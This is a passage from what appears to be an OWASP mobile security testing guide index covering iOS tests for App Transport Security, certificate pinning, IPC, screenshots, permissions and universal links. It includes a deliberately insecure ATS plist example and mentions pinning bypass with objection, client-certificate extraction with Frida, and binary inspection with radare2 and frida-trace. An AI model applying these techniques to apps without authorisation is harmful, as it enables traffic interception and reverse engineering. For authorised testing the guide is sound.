Apple warns: Disabling ATS means that unsecured HTTP connections are allowed. HTTPS connections are also allowed, and are still subject to default server trust evaluation. However, extended security checks\u2014like requiring a minimum Transport Layer Security (TLS) protocol version\u2014are disabled. Without ATS, you\u2019re also free to loosen the default server trust requirements, as described in \"Performing Manual Server Trust Authentication\".
The following snippet shows a vulnerable example of an app disabling ATS restrictions globally.
<key>NSAppTransportSecurity</key>\n<dict>\n <key>NSAllowsArbitraryLoads</key>\n <true/>\n</dict>\n
ATS should be examined taking the application's context into consideration. The application may have to define ATS exceptions to fulfill its intended purpose. For example, the Firefox iOS application has ATS disabled globally. This exception is acceptable because otherwise the application would not be able to connect to any HTTP website that does not have all the ATS requirements. In some cases, apps might disable ATS globally but enable it for certain domains to e.g. securely load metadata or still allow secure login.
ATS should include a justification string for this (e.g. \"The app must connect to a server managed by another entity that doesn\u2019t support secure connections.\").
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/#dynamic-analysis","title":"Dynamic Analysis","text":"Intercept the tested app's incoming and outgoing network traffic and make sure that this traffic is encrypted. You can intercept network traffic in any of the following ways:
Some applications may not work with proxies like Burp and OWASP ZAP because of Certificate Pinning. In such a scenario, please check \"Testing Custom Certificate Stores and Certificate Pinning\".
For more details refer to:
Remember to inspect the corresponding justifications to discard that it might be part of the app intended purpose.
It is possible to verify which ATS settings can be used when communicating to a certain endpoint. On macOS the command line utility nscurl
can be used. A permutation of different settings will be executed and verified against the specified endpoint. If the default ATS secure connection test is passing, ATS can be used in its default secure configuration. If there are any fails in the nscurl output, please change the server side configuration of TLS to make the server side more secure, rather than weakening the configuration in ATS on the client. See the article \"Identifying the Source of Blocked Connections\" in the Apple Developer Documentation for more details.
Refer to section \"Verifying the TLS Settings\" in chapter Testing Network Communication for details.
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0067/","title":"Testing Endpoint Identity Verification","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0067/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0067/#static-analysis","title":"Static Analysis","text":"Using TLS to transport sensitive information over the network is essential for security. However, encrypting communication between a mobile application and its backend API is not trivial. Developers often decide on simpler but less secure solutions (e.g., those that accept any certificate) to facilitate the development process, and sometimes these weak solutions make it into the production version, potentially exposing users to man-in-the-middle attacks.
These are some of the issues that should be addressed:
Make sure that the hostname and the certificate itself are verified correctly. Examples and common pitfalls are available in the official Apple documentation.
We highly recommend supporting static analysis with the dynamic analysis. If you don't have the source code or the app is difficult to reverse engineer, having a solid dynamic analysis strategy can definitely help. In that case you won't know if the app uses low or high-level APIs but you can still test for different trust evaluation scenarios (e.g. \"does the app accept a self-signed certificate?\").
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0067/#dynamic-analysis","title":"Dynamic Analysis","text":"Our test approach is to gradually relax security of the SSL handshake negotiation and check which security mechanisms are enabled.
If executing the instructions from the previous step doesn't lead to traffic being proxied, it may mean that certificate pinning is actually implemented and all security measures are in place. However, you still need to bypass the pinning in order to test the application. Please refer to the section \"Bypassing Certificate Pinning\" for more information on this.
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0068/","title":"Testing Custom Certificate Stores and Certificate Pinning","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0068/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0068/#static-analysis","title":"Static Analysis","text":"Verify that the server certificate is pinned. Pinning can be implemented on various levels in terms of the certificate tree presented by the server:
The latest approach recommended by Apple is to specify a pinned CA public key in the Info.plist
file under App Transport Security Settings. You can find an example in their article Identity Pinning: How to configure server certificates for your app.
Another common approach is to use the connection:willSendRequestForAuthenticationChallenge:
method of NSURLConnectionDelegate
to check if the certificate provided by the server is valid and matches the certificate stored in the app. You can find more details in the HTTPS Server Trust Evaluation technical note.
The following third-party libraries include pinning functionality:
ServerTrustPolicy
per domain for which you can define a PinnedCertificatesTrustEvaluator
. See its documentation for more details.AFSecurityPolicy
to configure your pinning.Follow the instructions from the Dynamic Analysis section of \"Testing Endpoint Identity Verification. If doing so doesn't lead to traffic being proxied, it may mean that certificate pinning is actually implemented and all security measures are in place. Does the same happen for all domains?
As a quick smoke test, you can try to bypass certificate pinning using objection as described in \"Bypassing Certificate Pinning\". Pinning related APIs being hooked by objection should appear in objection's output.
However, keep in mind that:
In both cases, the app or some of its components might implement custom pinning in a way that is supported by objection. Please check the static analysis section for specific pinning indicators and more in-depth testing.
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0068/#client-certificate-validation","title":"Client certificate validation","text":"Some applications use mTLS (mutual TLS), meaning that the application verifies the server's certificate and the server verifies the client's certificate. You can notice this if there is an error in Burp Alerts tab indicating that client failed to negotiate connection.
There are a couple of things worth noting:
The most common and improper way of using mTLS is to store the client certificate within the application bundle and hardcode the password. This obviously does not bring much security, because all clients will share the same certificate.
A second way of storing the certificate (and possibly password) is to use the Keychain. Upon first login, the application should download the personal certificate and store it securely in the Keychain.
Sometimes applications have one certificate that is hardcoded and use it for the first login and then the personal certificate is downloaded. In this case, check if it's possible to still use the 'generic' certificate to connect to the server.
Once you have extracted the certificate from the application (e.g. using Frida), add it as client certificate in Burp, and you will be able to intercept the traffic.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0056/","title":"Determining Whether Sensitive Data Is Exposed via IPC Mechanisms","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0056/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0056/#static-analysis","title":"Static Analysis","text":"The following section summarizes keywords that you should look for to identify IPC implementations within iOS source code.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0056/#xpc-services","title":"XPC Services","text":"Several classes may be used to implement the NSXPCConnection API:
You can set security attributes for the connection. The attributes should be verified.
Check for the following two files in the Xcode project for the XPC Services API (which is C-based):
xpc.h
connection.h
Keywords to look for in low-level implementations:
Keywords to look for in high-level implementations (Core Foundation and Foundation wrappers):
Keywords to look for:
Verify IPC mechanisms with static analysis of the iOS source code. No iOS tool is currently available to verify IPC usage.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0057/","title":"Checking for Sensitive Data Disclosed Through the User Interface","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0057/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0057/#static-analysis","title":"Static Analysis","text":"A text field that masks its input can be configured in two ways:
Storyboard In the iOS project's storyboard, navigate to the configuration options for the text field that takes sensitive data. Make sure that the option \"Secure Text Entry\" is selected. If this option is activated, dots are shown in the text field in place of the text input.
Source Code If the text field is defined in the source code, make sure that the option isSecureTextEntry
is set to \"true\". This option obscures the text input by showing dots.
sensitiveTextField.isSecureTextEntry = true\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0057/#dynamic-analysis","title":"Dynamic Analysis","text":"To determine whether the application leaks any sensitive information to the user interface, run the application and identify components that either show such information or take it as input.
If the information is masked by, for example, asterisks or dots, the app isn't leaking data to the user interface.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0059/","title":"Testing Auto-Generated Screenshots for Sensitive Information","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0059/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0059/#static-analysis","title":"Static Analysis","text":"If you have the source code, search for the applicationDidEnterBackground
method to determine whether the application sanitizes the screen before being backgrounded.
The following is a sample implementation using a default background image (overlayImage.png
) whenever the application is backgrounded, overriding the current view:
Swift:
private var backgroundImage: UIImageView?\n\nfunc applicationDidEnterBackground(_ application: UIApplication) {\n let myBanner = UIImageView(image: #imageLiteral(resourceName: \"overlayImage\"))\n myBanner.frame = UIScreen.main.bounds\n backgroundImage = myBanner\n window?.addSubview(myBanner)\n}\n\nfunc applicationWillEnterForeground(_ application: UIApplication) {\n backgroundImage?.removeFromSuperview()\n}\n
Objective-C:
@property (UIImageView *)backgroundImage;\n\n- (void)applicationDidEnterBackground:(UIApplication *)application {\n UIImageView *myBanner = [[UIImageView alloc] initWithImage:@\"overlayImage.png\"];\n self.backgroundImage = myBanner;\n self.backgroundImage.bounds = UIScreen.mainScreen.bounds;\n [self.window addSubview:myBanner];\n}\n\n- (void)applicationWillEnterForeground:(UIApplication *)application {\n [self.backgroundImage removeFromSuperview];\n}\n
This sets the background image to overlayImage.png
whenever the application is backgrounded. It prevents sensitive data leaks because overlayImage.png
will always override the current view.
You can use a visual approach to quickly validate this test case using any iOS device (jailbroken or not):
If required, you may also collect evidence by performing steps 1 to 3 on a jailbroken device or a non-jailbroken device after repackaging the app with the Frida Gadget. After that, connect to the iOS device per SSH or by other means and navigate to the Snapshots directory. The location may differ on each iOS version but it's usually inside the app's Library directory. For instance, on iOS 14.5 the Snapshots directory is located at:
/var/mobile/Containers/Data/Application/$APP_ID/Library/SplashBoard/Snapshots/sceneID:$APP_NAME-default/\n
The screenshots inside that folder should not contain any sensitive information.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/","title":"Testing App Permissions","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#static-analysis","title":"Static Analysis","text":"Since iOS 10, these are the main areas which you need to inspect for permissions:
If having the original source code, you can verify the permissions included in the Info.plist
file:
Info.plist
file in the default editor and search for the keys starting with \"Privacy -\"
.You may switch the view to display the raw values by right-clicking and selecting \"Show Raw Keys/Values\" (this way for example \"Privacy - Location When In Use Usage Description\"
will turn into NSLocationWhenInUseUsageDescription
).
If only having the IPA:
Info.plist
is located in Payload/<appname>.app/Info.plist
.plutil -convert xml1 Info.plist
) as explained in the chapter \"iOS Basic Security Testing\", section \"The Info.plist File\".Inspect all purpose strings Info.plist keys, usually ending with UsageDescription
:
<plist version=\"1.0\">\n<dict>\n <key>NSLocationWhenInUseUsageDescription</key>\n <string>Your location is used to provide turn-by-turn directions to your destination.</string>\n
For each purpose string in the Info.plist
file, check if the permission makes sense.
For example, imagine the following lines were extracted from a Info.plist
file used by a Solitaire game:
<key>NSHealthClinicalHealthRecordsShareUsageDescription</key>\n<string>Share your health data with us!</string>\n<key>NSCameraUsageDescription</key>\n<string>We want to access your camera</string>\n
It should be suspicious that a regular solitaire game requests this kind of resource access as it probably does not have any need for accessing the camera nor a user's health-records.
Apart from simply checking if the permissions make sense, further analysis steps might be derived from analyzing purpose strings e.g. if they are related to storage sensitive data. For example, NSPhotoLibraryUsageDescription
can be considered as a storage permission giving access to files that are outside of the app's sandbox and might also be accessible by other apps. In this case, it should be tested that no sensitive data is being stored there (photos in this case). For other purpose strings like NSLocationAlwaysUsageDescription
, it must be also considered if the app is storing this data securely. Refer to the \"Testing Data Storage\" chapter for more information and best practices on securely storing sensitive data.
When you do not have the original source code, you should analyze the IPA and search inside for the embedded provisioning profile that is usually located in the root app bundle folder (Payload/<appname>.app/
) under the name embedded.mobileprovision
.
This file is not a .plist
, it is encoded using Cryptographic Message Syntax. On macOS you can inspect an embedded provisioning profile's entitlements using the following command:
security cms -D -i embedded.mobileprovision\n
and then search for the Entitlements key region (<key>Entitlements</key>
).
If you only have the app's IPA or simply the installed app on a jailbroken device, you normally won't be able to find .entitlements
files. This could be also the case for the embedded.mobileprovision
file. Still, you should be able to extract the entitlements property lists from the app binary yourself (which you've previously obtained as explained in the \"iOS Basic Security Testing\" chapter, section \"Acquiring the App Binary\").
The following steps should work even when targeting an encrypted binary. If for some reason they don't, you'll have to decrypt and extract the app with e.g. Clutch (if compatible with your iOS version), frida-ios-dump or similar.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#extracting-the-entitlements-plist-from-the-app-binary","title":"Extracting the Entitlements Plist from the App Binary","text":"If you have the app binary on your computer, one approach is to use binwalk to extract (-e
) all XML files (-y=xml
):
$ binwalk -e -y=xml ./Telegram\\ X\n\nDECIMAL HEXADECIMAL DESCRIPTION\n--------------------------------------------------------------------------------\n1430180 0x15D2A4 XML document, version: \"1.0\"\n1458814 0x16427E XML document, version: \"1.0\"\n
Or you can use radare2 (-qc
to quietly run one command and exit) to search all strings on the app binary (izz
) containing \"PropertyList\" (~PropertyList
):
$ r2 -qc 'izz~PropertyList' ./Telegram\\ X\n\n0x0015d2a4 ascii <?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\\n<!DOCTYPE plist PUBLIC\n\"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\\n<plist version=\"1.0\">\n...<key>com.apple.security.application-groups</key>\\n\\t\\t<array>\n\\n\\t\\t\\t<string>group.ph.telegra.Telegraph</string>...\n\n0x0016427d ascii H<?xml version=\"1.0\" encoding=\"UTF-8\"?>\\n<!DOCTYPE plist PUBLIC\n\"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\\n<plist version=\"1.0\">\\n\n<dict>\\n\\t<key>cdhashes</key>...\n
In both cases (binwalk or radare2) we were able to extract the same two plist
files. If we inspect the first one (0x0015d2a4) we see that we were able to completely recover the original entitlements file from Telegram.
Note: the strings
command will not help here as it will not be able to find this information. Better use grep with the -a
flag directly on the binary or use radare2 (izz
)/rabin2 (-zz
).
If you access the app binary on the jailbroken device (e.g via SSH), you can use grep with the -a, --text
flag (treats all files as ASCII text):
$ grep -a -A 5 'PropertyList' /var/containers/Bundle/Application/\n 15E6A58F-1CA7-44A4-A9E0-6CA85B65FA35/Telegram X.app/Telegram\\ X\n\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n <dict>\n <key>com.apple.security.application-groups</key>\n <array>\n ...\n
Play with the -A num, --after-context=num
flag to display more or less lines. You may use tools like the ones we presented above as well, if you have them also installed on your jailbroken iOS device.
This method should work even if the app binary is still encrypted (it was tested against several App Store apps).
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#source-code-inspection","title":"Source Code Inspection","text":"After having checked the <appname>.entitlements
file and the Info.plist
file, it is time to verify how the requested permissions and assigned capabilities are put to use. For this, a source code review should be enough. However, if you don't have the original source code, verifying the use of permissions might be specially challenging as you might need to reverse engineer the app, refer to the \"Dynamic Analysis\" for more details on how to proceed.
When doing a source code review, pay attention to:
Info.plist
file match the programmatic implementations.Users can grant or revoke authorization at any time via \"Settings\", therefore apps normally check the authorization status of a feature before accessing it. This can be done by using dedicated APIs available for many system frameworks that provide access to protected resources.
You can use the Apple Developer Documentation as a starting point. For example:
state
property of the CBCentralManager
class is used to check system-authorization status for using Bluetooth peripherals.Location: search for methods of CLLocationManager
, e.g. locationServicesEnabled
.
func checkForLocationServices() {\n if CLLocationManager.locationServicesEnabled() {\n // Location services are available, so query the user\u2019s location.\n } else {\n // Update your app\u2019s UI to show that the location is unavailable.\n }\n}\n
See Table1 in \"Determining the Availability of Location Services\" (Apple Developer Documentation) for a complete list.
Go through the application searching for usages of these APIs and check what happens to sensitive data that might be obtained from them. For example, it might be stored or transmitted over the network, if this is the case, proper data protection and transport security should be additionally verified.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#dynamic-analysis","title":"Dynamic Analysis","text":"With help of the static analysis you should already have a list of the included permissions and app capabilities in use. However, as mentioned in \"Source Code Inspection\", spotting the sensitive data and APIs related to those permissions and app capabilities might be a challenging task when you don't have the original source code. Dynamic analysis can help here getting inputs to iterate onto the static analysis.
Following an approach like the one presented below should help you spotting the mentioned sensitive data and APIs:
NSLocationWhenInUseUsageDescription
).Core Location
). You may use the Apple Developer Documentation for this.CLLocationManager
), for example, using frida-trace
.Once all methods were identified, you might use this knowledge to reverse engineer the app and try to find out how the data is being handled. While doing that you might spot new methods involved in the process which you can again feed to step 3. above and keep iterating between static and dynamic analysis.
In the following example we use Telegram to open the share dialog from a chat and frida-trace to identify which methods are being called.
First we launch Telegram and start a trace for all methods matching the string \"authorizationStatus\" (this is a general approach because more classes apart from CLLocationManager
implement this method):
frida-trace -U \"Telegram\" -m \"*[* *authorizationStatus*]\"\n
-U
connects to the USB device. -m
includes an Objective-C method to the traces. You can use a glob pattern (e.g. with the \"*\" wildcard, -m \"*[* *authorizationStatus*]\"
means \"include any Objective-C method of any class containing 'authorizationStatus'\"). Type frida-trace -h
for more information.
Now we open the share dialog:
The following methods are displayed:
1942 ms +[PHPhotoLibrary authorizationStatus]\n 1959 ms +[TGMediaAssetsLibrary authorizationStatusSignal]\n 1959 ms | +[TGMediaAssetsModernLibrary authorizationStatusSignal]\n
If we click on Location, another method will be traced:
11186 ms +[CLLocationManager authorizationStatus]\n 11186 ms | +[CLLocationManager _authorizationStatus]\n 11186 ms | | +[CLLocationManager _authorizationStatusForBundleIdentifier:0x0 bundle:0x0]\n
Use the auto-generated stubs of frida-trace to get more information like the return values and a backtrace. Do the following modifications to the JavaScript file below (the path is relative to the current directory):
// __handlers__/__CLLocationManager_authorizationStatus_.js\n\n onEnter: function (log, args, state) {\n log(\"+[CLLocationManager authorizationStatus]\");\n log(\"Called from:\\n\" +\n Thread.backtrace(this.context, Backtracer.ACCURATE)\n .map(DebugSymbol.fromAddress).join(\"\\n\\t\") + \"\\n\");\n },\n onLeave: function (log, retval, state) {\n console.log('RET :' + retval.toString());\n }\n
Clicking again on \"Location\" reveals more information:
3630 ms -[CLLocationManager init]\n 3630 ms | -[CLLocationManager initWithEffectiveBundleIdentifier:0x0 bundle:0x0]\n 3634 ms -[CLLocationManager setDelegate:0x14c9ab000]\n 3641 ms +[CLLocationManager authorizationStatus]\nRET: 0x4\n 3641 ms Called from:\n0x1031aa158 TelegramUI!+[TGLocationUtils requestWhenInUserLocationAuthorizationWithLocationManager:]\n 0x10337e2c0 TelegramUI!-[TGLocationPickerController initWithContext:intent:]\n 0x101ee93ac TelegramUI!0x1013ac\n
We see that +[CLLocationManager authorizationStatus]
returned 0x4
(CLAuthorizationStatus.authorizedWhenInUse) and was called by +[TGLocationUtils requestWhenInUserLocationAuthorizationWithLocationManager:]
. As we anticipated before, you might use this kind of information as an entry point when reverse engineering the app and from there get inputs (e.g. names of classes or methods) to keep feeding the dynamic analysis.
Next, there is a visual way to inspect the status of some app permissions when using the iPhone/iPad by opening \"Settings\" and scrolling down until you find the app you're interested in. When clicking on it, this will open the \"ALLOW APP_NAME TO ACCESS\" screen. However, not all permissions might be displayed yet. You will have to trigger them in order to be listed on that screen.
For example, in the previous example, the \"Location\" entry was not being listed until we triggered the permission dialogue for the first time. Once we did it, no matter if we allowed the access or not, the \"Location\" entry will be displayed.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/","title":"Testing Universal Links","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#static-analysis","title":"Static Analysis","text":"Testing universal links on a static approach includes doing the following:
Universal links require the developer to add the Associated Domains entitlement and include in it a list of the domains that the app supports.
In Xcode, go to the Capabilities tab and search for Associated Domains. You can also inspect the .entitlements
file looking for com.apple.developer.associated-domains
. Each of the domains must be prefixed with applinks:
, such as applinks:www.mywebsite.com
.
Here's an example from Telegram's .entitlements
file:
<key>com.apple.developer.associated-domains</key>\n <array>\n <string>applinks:telegram.me</string>\n <string>applinks:t.me</string>\n </array>\n
More detailed information can be found in the archived Apple Developer Documentation.
If you don't have the original source code you can still search for them, as explained in \"Entitlements Embedded in the Compiled App Binary\".
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#retrieving-the-apple-app-site-association-file","title":"Retrieving the Apple App Site Association File","text":"Try to retrieve the apple-app-site-association
file from the server using the associated domains you got from the previous step. This file needs to be accessible via HTTPS, without any redirects, at https://<domain>/apple-app-site-association
or https://<domain>/.well-known/apple-app-site-association
.
You can retrieve it yourself using your browser and navigating to https://<domain>/apple-app-site-association
, https://<domain>/.well-known/apple-app-site-association
or using Apple's CDN at https://app-site-association.cdn-apple.com/a/v1/<domain>
.
Alternatively, you can use the Apple App Site Association (AASA) Validator. After entering the domain, it will display the file, verify it for you and show the results (e.g. if it is not being properly served over HTTPS). See the following example from apple.com https://www.apple.com/.well-known/apple-app-site-association
:
{\n \"activitycontinuation\": {\n \"apps\": [\n \"W74U47NE8E.com.apple.store.Jolly\"\n ]\n },\n \"applinks\": {\n \"apps\": [],\n \"details\": [\n {\n \"appID\": \"W74U47NE8E.com.apple.store.Jolly\",\n \"paths\": [\n \"NOT /shop/buy-iphone/*\",\n \"NOT /us/shop/buy-iphone/*\",\n \"/xc/*\",\n \"/shop/buy-*\",\n \"/shop/product/*\",\n \"/shop/bag/shared_bag/*\",\n \"/shop/order/list\",\n \"/today\",\n \"/shop/watch/watch-accessories\",\n \"/shop/watch/watch-accessories/*\",\n \"/shop/watch/bands\",\n ] } ] }\n}\n
The \"details\" key inside \"applinks\" contains a JSON representation of an array that might contain one or more apps. The \"appID\" should match the \"application-identifier\" key from the app\u2019s entitlements. Next, using the \"paths\" key, the developers can specify certain paths to be handled on a per app basis. Some apps, like Telegram, use a standalone * (\"paths\": [\"*\"]
) in order to allow all possible paths. Only if specific areas of the website should not be handled by some app, the developer can restrict access by excluding them by prepending a \"NOT \"
(note the whitespace after the T) to the corresponding path. Also remember that the system will look for matches by following the order of the dictionaries in the array (first match wins).
This path exclusion mechanism is not to be seen as a security feature but rather as a filter that developers might use to specify which apps open which links. By default, iOS does not open any unverified links.
Remember that universal links verification occurs at installation time. iOS retrieves the AASA file for the declared domains (applinks
) in its com.apple.developer.associated-domains
entitlement. iOS will refuse to open those links if the verification did not succeed. Some reasons to fail verification might include:
appID
s do not match (this would be the case of a malicious app). iOS would successfully prevent any possible hijacking attacks.In order to receive links and handle them appropriately, the app delegate has to implement application:continueUserActivity:restorationHandler:
. If you have the original project try searching for this method.
Please note that if the app uses openURL:options:completionHandler:
to open a universal link to the app's website, the link won't open in the app. As the call originates from the app, it won't be handled as a universal link.
From Apple Docs: When iOS launches your app after a user taps a universal link, you receive an NSUserActivity
object with an activityType
value of NSUserActivityTypeBrowsingWeb
. The activity object\u2019s webpageURL
property contains the URL that the user is accessing. The webpage URL property always contains an HTTP or HTTPS URL, and you can use NSURLComponents
APIs to manipulate the components of the URL. [...] To protect users\u2019 privacy and security, you should not use HTTP when you need to transport data; instead, use a secure transport protocol such as HTTPS.
From the note above we can highlight that:
NSUserActivity
object comes from the continueUserActivity
parameter, as seen in the method above.webpageURL
must be HTTP or HTTPS (any other scheme should throw an exception). The scheme
instance property of URLComponents
/ NSURLComponents
can be used to verify this.If you don't have the original source code you can use radare2 or rabin2 to search the binary strings for the link receiver method:
$ rabin2 -zq Telegram\\ X.app/Telegram\\ X | grep restorationHan\n\n0x1000deea9 53 52 application:continueUserActivity:restorationHandler:\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#checking-the-data-handler-method","title":"Checking the Data Handler Method","text":"You should check how the received data is validated. Apple explicitly warns about this:
Universal links offer a potential attack vector into your app, so make sure to validate all URL parameters and discard any malformed URLs. In addition, limit the available actions to those that do not risk the user\u2019s data. For example, do not allow universal links to directly delete content or access sensitive information about the user. When testing your URL-handling code, make sure your test cases include improperly formatted URLs.
As stated in the Apple Developer Documentation, when iOS opens an app as the result of a universal link, the app receives an NSUserActivity
object with an activityType
value of NSUserActivityTypeBrowsingWeb
. The activity object\u2019s webpageURL
property contains the HTTP or HTTPS URL that the user accesses. The following example in Swift verifies exactly this before opening the URL:
func application(_ application: UIApplication, continue userActivity: NSUserActivity,\n restorationHandler: @escaping ([UIUserActivityRestoring]?) -> Void) -> Bool {\n // ...\n if userActivity.activityType == NSUserActivityTypeBrowsingWeb, let url = userActivity.webpageURL {\n application.open(url, options: [:], completionHandler: nil)\n }\n\n return true\n}\n
In addition, remember that if the URL includes parameters, they should not be trusted before being carefully sanitized and validated (even when coming from a trusted domain). For example, they might have been spoofed by an attacker or might include malformed data. If that is the case, the whole URL and therefore the universal link request must be discarded.
The NSURLComponents
API can be used to parse and manipulate the components of the URL. This can be also part of the method application:continueUserActivity:restorationHandler:
itself or might occur on a separate method being called from it. The following example demonstrates this:
func application(_ application: UIApplication,\n continue userActivity: NSUserActivity,\n restorationHandler: @escaping ([Any]?) -> Void) -> Bool {\n guard userActivity.activityType == NSUserActivityTypeBrowsingWeb,\n let incomingURL = userActivity.webpageURL,\n let components = NSURLComponents(url: incomingURL, resolvingAgainstBaseURL: true),\n let path = components.path,\n let params = components.queryItems else {\n return false\n }\n\n if let albumName = params.first(where: { $0.name == \"albumname\" })?.value,\n let photoIndex = params.first(where: { $0.name == \"index\" })?.value {\n // Interact with album name and photo index\n\n return true\n\n } else {\n // Handle when album and/or album name or photo index missing\n\n return false\n }\n}\n
Finally, as stated above, be sure to verify that the actions triggered by the URL do not expose sensitive information or risk the user\u2019s data in any way.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#checking-if-the-app-is-calling-other-apps-universal-links","title":"Checking if the App is Calling Other App's Universal Links","text":"An app might be calling other apps via universal links in order to simply trigger some actions or to transfer information, in that case, it should be verified that it is not leaking sensitive information.
If you have the original source code, you can search it for the openURL:options: completionHandler:
method and check the data being handled.
Note that the openURL:options:completionHandler:
method is not only used to open universal links but also to call custom URL schemes.
This is an example from the Telegram app:
}, openUniversalUrl: { url, completion in\n if #available(iOS 10.0, *) {\n var parsedUrl = URL(string: url)\n if let parsed = parsedUrl {\n if parsed.scheme == nil || parsed.scheme!.isEmpty {\n parsedUrl = URL(string: \"https://\\(url)\")\n }\n }\n\n if let parsedUrl = parsedUrl {\n return UIApplication.shared.open(parsedUrl,\n options: [UIApplicationOpenURLOptionUniversalLinksOnly: true as NSNumber],\n completionHandler: { value in completion.completion(value)}\n )\n
Note how the app adapts the scheme
to \"https\" before opening it and how it uses the option UIApplicationOpenURLOptionUniversalLinksOnly: true
that opens the URL only if the URL is a valid universal link and there is an installed app capable of opening that URL.
If you don't have the original source code, search in the symbols and in the strings of the app binary. For example, we will search for Objective-C methods that contain \"openURL\":
$ rabin2 -zq Telegram\\ X.app/Telegram\\ X | grep openURL\n\n0x1000dee3f 50 49 application:openURL:sourceApplication:annotation:\n0x1000dee71 29 28 application:openURL:options:\n0x1000df2c9 9 8 openURL:\n0x1000df772 35 34 openURL:options:completionHandler:\n
As expected, openURL:options:completionHandler:
is among the ones found (remember that it might be also present because the app opens custom URL schemes). Next, to ensure that no sensitive information is being leaked you'll have to perform dynamic analysis and inspect the data being transmitted. Please refer to \"Identifying and Hooking the URL Handler Method\" for some examples on hooking and tracing this method.
If an app is implementing universal links, you should have the following outputs from the static analysis:
You can use this now to dynamically test them:
Unlike custom URL schemes, unfortunately you cannot test universal links from Safari just by typing them in the search bar directly as this is not allowed by Apple. But you can test them anytime using other apps like the Notes app:
To do it from Safari you will have to find an existing link on a website that, once clicked, will be recognized as a Universal Link. This can be a bit time consuming.
Alternatively you can also use Frida for this, see the section \"Performing URL Requests\" for more details.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#identifying-valid-universal-links","title":"Identifying Valid Universal Links","text":"First of all we will see the difference between opening an allowed Universal Link and one that shouldn't be allowed.
From the apple-app-site-association
of apple.com we have seen above we chose the following paths:
\"paths\": [\n \"NOT /shop/buy-iphone/*\",\n ...\n \"/today\",\n
One of them should offer the \"Open in app\" option and the other should not.
If we long press on the first one (http://www.apple.com/shop/buy-iphone/iphone-xr
) it only offers the option to open it (in the browser).
If we long press on the second (http://www.apple.com/today
) it shows options to open it in Safari and in \"Apple Store\":
Note that there is a difference between a click and a long press. Once we long press a link and select an option, e.g. \"Open in Safari\", this will become the default option for all future clicks until we long press again and select another option.
If we repeat the process on the method application:continueUserActivity: restorationHandler:
by either hooking or tracing, we will see how it gets called as soon as we open the allowed universal link. For this you can use for example frida-trace
:
frida-trace -U \"Apple Store\" -m \"*[* *restorationHandler*]\"\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#tracing-the-link-receiver-method","title":"Tracing the Link Receiver Method","text":"This section explains how to trace the link receiver method and how to extract additional information. For this example, we will use Telegram, as there are no restrictions in its apple-app-site-association
file:
{\n \"applinks\": {\n \"apps\": [],\n \"details\": [\n {\n \"appID\": \"X834Q8SBVP.org.telegram.TelegramEnterprise\",\n \"paths\": [\n \"*\"\n ]\n },\n {\n \"appID\": \"C67CF9S4VU.ph.telegra.Telegraph\",\n \"paths\": [\n \"*\"\n ]\n },\n {\n \"appID\": \"X834Q8SBVP.org.telegram.Telegram-iOS\",\n \"paths\": [\n \"*\"\n ]\n }\n ]\n }\n}\n
In order to open the links we will also use the Notes app and frida-trace with the following pattern:
frida-trace -U Telegram -m \"*[* *restorationHandler*]\"\n
Write https://t.me/addstickers/radare
(found through a quick Internet research) and open it from the Notes app.
First we let frida-trace generate the stubs in __handlers__/
:
$ frida-trace -U Telegram -m \"*[* *restorationHandler*]\"\nInstrumenting functions...\n-[AppDelegate application:continueUserActivity:restorationHandler:]\n
